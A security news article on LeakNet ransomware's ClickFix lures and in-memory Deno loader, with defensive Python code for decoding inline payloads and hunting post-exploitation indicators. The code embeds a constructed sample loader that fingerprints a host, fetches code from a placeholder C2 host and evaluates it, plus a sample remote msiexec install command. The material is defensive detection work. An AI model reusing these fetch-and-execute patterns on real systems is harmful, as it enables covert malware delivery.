Hackers News
Threats

LeakNet Ransomware Uses ClickFix Lures and Deno Loader for Stealthy Attacks


David Kimber
March 18, 2026 | 4 min read

Key Takeaways

  • The LeakNet ransomware group has sharply escalated its operations, abandoning its earlier pace of roughly three victims per month for a much faster tempo.
  • The group now employs “ClickFix” social engineering lures and a highly stealthy, Deno-based memory loader to bypass traditional security defenses.
  • ClickFix lures are hosted on legitimate but compromised websites, presenting fake Cloudflare Turnstile checks to trick users into executing malicious commands.
  • The Deno-based loader operates entirely in memory, making it exceptionally difficult for signature-based security tools to detect.
  • Defenders should focus on behavioral monitoring, restrict user command execution, and implement network egress filtering to mitigate the threat.

LeakNet Ransomware Elevates Threat with ClickFix Lures and Stealthy Deno Loader

The LeakNet ransomware collective is undergoing a significant operational transformation, abandoning its previous, slower pace of approximately three victims per month in favor of a rapid expansion. This surge in activity is underpinned by the integration of sophisticated new tools specifically engineered to bypass the majority of existing security safeguards.

Central to LeakNet’s updated arsenal are two critical additions: a cunning social engineering tactic dubbed ClickFix and a highly evasive, memory-resident loader built upon the Deno JavaScript runtime.

ClickFix: A Broader Net for Victim Acquisition

While ClickFix itself isn’t a novel technique within the threat landscape, its adoption by LeakNet signals a pivotal shift in the group’s victim acquisition strategy. Rather than relying on purchasing stolen access credentials from initial access brokers (IABs) in illicit online marketplaces, LeakNet now deploys deceptive verification pages on compromised, yet otherwise legitimate, websites.

When an unsuspecting user navigates to one of these tainted pages, they are presented with what appears to be a standard Cloudflare Turnstile verification prompt, instructing them to manually execute a specific command. This approach lacks a defined victim profile; instead, LeakNet casts a wide net, banking on a percentage of users to fall for the ruse.

Analysts at ReliaQuest meticulously documented this activity across multiple recent incidents, confidently attributing it to LeakNet due to consistent infrastructure and identical tactics, techniques, and procedures (TTPs). This strategic pivot away from IABs is a calculated move, eliminating a dependency that previously hampered the group’s speed and dramatically expanding the pool of potential targets. ClickFix has emerged as a favored delivery mechanism across the broader threat landscape, reportedly facilitating the distribution of 59% of the top malware families tracked in 2025.

This evolving methodology places any employee browsing the web at increased risk. Because these malicious lures reside on authentic websites rather than attacker-controlled domains, conventional network-layer defenses generate significantly fewer alerts. A red flag typically only appears after a user has already executed the malicious command, emphasizing the critical role of behavioral monitoring—especially for suspicious msiexec commands and unexpected outbound connections—over exclusive reliance on domain-based blocking.

What makes LeakNet’s current campaign particularly concerning is the consistent post-exploitation chain, which remains identical regardless of the initial entry point, whether through ClickFix or Microsoft Teams phishing. The group employs the same set of tools for execution, lateral movement, and payload staging, irrespective of how initial access was gained. This operational consistency, however, offers a valuable advantage for defenders: understanding these predictable steps provides clear opportunities for detection and prompt attack termination.

The Stealthy Deno-Based Loader

A technically sophisticated and particularly dangerous component of LeakNet’s updated toolkit is a previously undocumented loader built upon Deno, a legitimate JavaScript and TypeScript runtime widely used by developers. LeakNet employs a “bring-your-own-runtime” (BYOR) strategy: instead of deploying a custom malicious binary that might trigger security tools, the attackers install the authentic, trusted Deno executable on the victim’s machine, then leverage it to execute harmful code.

The loader is launched via PowerShell and Visual Basic Script files, frequently named Romeo*.ps1 and Juliet*.vbs. Crucially, LeakNet never writes the JavaScript payload to disk, where it could be scanned; the launcher scripts instead hand it to Deno as a base64-encoded data URL, and Deno decodes and executes it entirely in memory. The only artifacts on the endpoint are the legitimately signed Deno runtime and the small launcher scripts, so signature-based tools that inspect files have nothing malicious to match; the payload exists only in the process command line and in memory.

Upon execution, the loader gathers fundamental system information, including username, hostname, memory size, and operating system version, subsequently generating a unique victim fingerprint. It then establishes a connection to attacker-controlled infrastructure to retrieve a victim-specific second-stage payload, prevents duplicate instances by binding to a local port, and initiates a continuous loop of fetching and executing further code directly in memory.
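Because the payload lives only in the Deno process command line, the command line is also where a responder can recover it. The following added triage helper (written for this article, not code from LeakNet or from ReliaQuest's report) parses a `deno` invocation, decodes any `data:` URL argument, and pulls out the fetch destinations and Deno API calls that mark a loader. The sample command line, script body and `example-c2.invalid` hostname are constructed placeholders that mimic the behaviour described above; they are not the group's real script.

```python
"""Triage helper for Deno "bring-your-own-runtime" loaders: recover and inspect a
payload passed to deno as a base64 data: URL instead of as a file on disk."""
import base64
import re
from urllib.parse import unquote

# Constructed example. The script body only imitates the behaviour the article
# describes (fingerprint, fetch a second stage, eval it in memory); it is not
# LeakNet's code, and the C2 hostname is a placeholder.
SAMPLE_SCRIPT = (
    'const info = {user: Deno.env.get("USERNAME"), host: Deno.hostname(), os: Deno.build.os};\n'
    'const r = await fetch("https://example-c2.invalid/stage2?id=" + btoa(JSON.stringify(info)));\n'
    'eval(await r.text());\n'
)
SAMPLE_CMDLINE = (
    'C:\\Users\\victim\\AppData\\Local\\deno\\deno.exe run -A '
    '"data:application/typescript;base64,'
    + base64.b64encode(SAMPLE_SCRIPT.encode()).decode() + '"'
)
# A normal developer invocation for contrast: script on disk, scoped permission.
BENIGN_CMDLINE = 'C:\\Users\\dev\\.deno\\bin\\deno.exe run --allow-net server.ts'

DATA_URL = re.compile(r"^data:(?P<mime>[^;,]*)(?P<params>(?:;[^;,]*)*),(?P<body>.*)$")
URL_RE = re.compile(r"https?://[^\s'\"`)]+")
# Deno APIs and JS constructs a loader needs; order matters for the report only.
SUSPICIOUS_CALLS = ("eval(", "fetch(", "Deno.hostname", "Deno.env",
                    "Deno.listen", "Deno.Command", "new Function(")


def decode_data_url(url):
    """Decode one RFC 2397 data: URL to text; return None if it is not one."""
    m = DATA_URL.match(url)
    if not m:
        return None
    body = m.group("body")
    if ";base64" in m.group("params").lower():
        body += "=" * (-len(body) % 4)            # tolerate stripped '=' padding
        return base64.b64decode(body).decode("utf-8", "replace")
    return unquote(body)                          # percent-encoded plain text


def triage_cmdline(cmdline):
    """Flag a Deno command line that executes an inline payload and extract IOCs."""
    result = {
        # deno / deno.exe appears as the image name (word boundary handles '\' before it)
        "deno": bool(re.search(r"\bdeno(\.exe)?(?=\s|$)", cmdline, re.I)),
        # -A / --allow-all grants the payload every permission Deno can give
        "allow_all": bool(re.search(r"\s(-A|--allow-all)(?=\s|$)", cmdline)),
        "inline_payload": False, "payloads": [], "urls": [], "api_calls": [],
    }
    for m in re.finditer(r"data:[^\s\"']+", cmdline):
        script = decode_data_url(m.group(0))
        if script is None:
            continue
        result["inline_payload"] = True
        result["payloads"].append(script)
        result["urls"] += URL_RE.findall(script)          # candidate C2 / staging hosts
        result["api_calls"] += [c for c in SUSPICIOUS_CALLS if c in script]
    result["verdict"] = ("suspicious: deno executing in-memory payload"
                         if result["deno"] and result["inline_payload"]
                         else "no inline payload")
    return result


if __name__ == "__main__":
    for cmd in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        r = triage_cmdline(cmd)
        print(r["verdict"], "| urls:", r["urls"], "| calls:", r["api_calls"])
```

Feed it the CommandLine field of a process-creation event (Sysmon Event ID 1 or Windows 4688 with command-line auditing enabled); the decoded script is what the endpoint never stored, and the URL list is a ready-made egress block list. The same decoder works for `node` or `bun` invocations that take a data: URL, so a rule keyed on "runtime binary plus inline data: argument" covers the BYOR pattern generally rather than Deno alone.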

What You Should Do

  • Block Newly Registered Domains: LeakNet’s command-and-control (C2) servers are often newly registered. Implement policies to block access to domains registered within the last few weeks.
  • Restrict User Command Execution: Limit the ability of regular users to launch commands through the Win+R Run dialog (and to paste into PowerShell or a terminal) on their workstations, since ClickFix depends on the victim executing the attacker's command by hand.
  • Control PsExec Usage: Restrict PsExec to only authorized administrators through Group Policy Objects (GPOs) to prevent its misuse for lateral movement.
  • Monitor for Anomalous Activity: Watch for signs of jli.dll sideloading in the C:\ProgramData\USOShared directory, unusual PsExec activity, and unexpected outbound connections, especially to S3 buckets.
  • Implement Behavioral Monitoring: Prioritize security solutions capable of detecting suspicious behavioral patterns, particularly concerning unexpected process execution and outbound network connections, rather than relying solely on signature-based or domain-blocking tools.
  • Isolate Compromised Hosts Immediately: Upon confirming post-exploitation behavior, promptly isolate the affected host to break the attack chain before ransomware deployment.
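The monitoring items above translate directly into hunting logic. The following added example (written for this article, not a ReliaQuest or vendor detection) runs five rules over a handful of constructed Sysmon-style events: a Run-dialog-launched installer pulling a remote URL (the ClickFix execution step), PsExec run by a user outside an assumed authorized set, jli.dll loading from C:\ProgramData\USOShared, non-browser egress to S3, and a connection to a domain younger than thirty days. The hostnames, users, paths and the `domain_age_days` field (which in practice would come from a WHOIS or passive-DNS enrichment feed) are all invented for the demonstration.

```python
"""Hunting rules for the LeakNet post-exploitation indicators listed above,
run over constructed Sysmon-style events (process create, image load, network)."""
import re

# Constructed events; hostnames, users and paths are invented for the example.
EVENTS = [
    {"id": 1, "type": "process", "user": "CORP\\jdoe", "parent": "explorer.exe",
     "image": "C:\\Windows\\System32\\msiexec.exe",
     "cmdline": "msiexec /qn /i https://cdn.example.invalid/update.msi"},
    {"id": 2, "type": "process", "user": "CORP\\jdoe", "parent": "cmd.exe",
     "image": "C:\\Tools\\PsExec.exe", "cmdline": "PsExec.exe \\\\FILESRV01 -s cmd"},
    {"id": 3, "type": "image_load", "user": "SYSTEM",
     "image": "C:\\ProgramData\\USOShared\\javaw.exe",
     "loaded": "C:\\ProgramData\\USOShared\\jli.dll"},
    {"id": 4, "type": "network", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\rundll32.exe",
     "dest_host": "drop-7f3a.s3.us-east-1.amazonaws.com", "domain_age_days": 4500},
    {"id": 5, "type": "network", "user": "CORP\\jdoe",
     "image": "C:\\Users\\jdoe\\AppData\\Local\\deno\\deno.exe",
     "dest_host": "updates-relay.example.invalid", "domain_age_days": 9},
    # Authorized admin using PsExec: must not fire.
    {"id": 6, "type": "process", "user": "CORP\\admin-ops", "parent": "powershell.exe",
     "image": "C:\\Tools\\PsExec.exe", "cmdline": "PsExec.exe \\\\WKS-22 -s ipconfig"},
    # Browser to a long-registered domain: must not fire.
    {"id": 7, "type": "network", "user": "CORP\\jdoe",
     "image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "dest_host": "static.example.invalid", "domain_age_days": 3650},
]

PSEXEC_ADMINS = {"corp\\admin-ops"}       # assumed authorized set; mirrors the GPO restriction
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe"}
NEW_DOMAIN_DAYS = 30                       # "registered within the last few weeks"
# bucket.s3.amazonaws.com, bucket.s3.<region>.amazonaws.com, s3-<region>.amazonaws.com
S3_HOST = re.compile(r"(^|\.)s3([.-][a-z0-9-]+)?\.amazonaws\.com$", re.I)
REMOTE_URL = re.compile(r"https?://", re.I)
USOSHARED = "c:\\programdata\\usoshared\\"


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_run_dialog_installer(e):
    """ClickFix execution: explorer.exe (Win+R) spawns an installer/shell with a remote URL."""
    return (e["type"] == "process" and e["parent"].lower() == "explorer.exe"
            and basename(e["image"]) in {"msiexec.exe", "powershell.exe", "mshta.exe", "cmd.exe"}
            and bool(REMOTE_URL.search(e["cmdline"])))


def rule_unauthorized_psexec(e):
    """PsExec launched by anyone outside the authorized admin set."""
    return (e["type"] == "process" and basename(e["image"]) in {"psexec.exe", "psexec64.exe"}
            and e["user"].lower() not in PSEXEC_ADMINS)


def rule_jli_sideload(e):
    """jli.dll (a Java launcher DLL) loaded from the USOShared staging directory."""
    p = e.get("loaded", "").lower()
    return e["type"] == "image_load" and p.startswith(USOSHARED) and basename(p) == "jli.dll"


def rule_s3_egress(e):
    """Non-browser process talking to an S3 endpoint, the page's staging channel of concern."""
    return (e["type"] == "network" and bool(S3_HOST.search(e["dest_host"]))
            and basename(e["image"]) not in BROWSERS)


def rule_young_domain(e):
    """Connection to a recently registered domain (age supplied by an enrichment feed)."""
    return e["type"] == "network" and e.get("domain_age_days", 10**6) < NEW_DOMAIN_DAYS


RULES = [rule_run_dialog_installer, rule_unauthorized_psexec,
         rule_jli_sideload, rule_s3_egress, rule_young_domain]


def hunt(events):
    """Return {rule_name: [event ids]} for every rule that fired on the event stream."""
    hits = {}
    for e in events:
        for rule in RULES:
            if rule(e):
                hits.setdefault(rule.__name__, []).append(e["id"])
    return hits


if __name__ == "__main__":
    for name, ids in hunt(EVENTS).items():
        print(f"{name}: events {ids}")
```

Events 6 and 7 are deliberate negatives: an allow-listed admin running PsExec and a browser reaching a mature domain should stay quiet, otherwise the rules are too noisy to act on. Any single hit from rules one through three on a host is the point at which the isolation step above should be taken, before the payload-staging and encryption phases the article describes.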
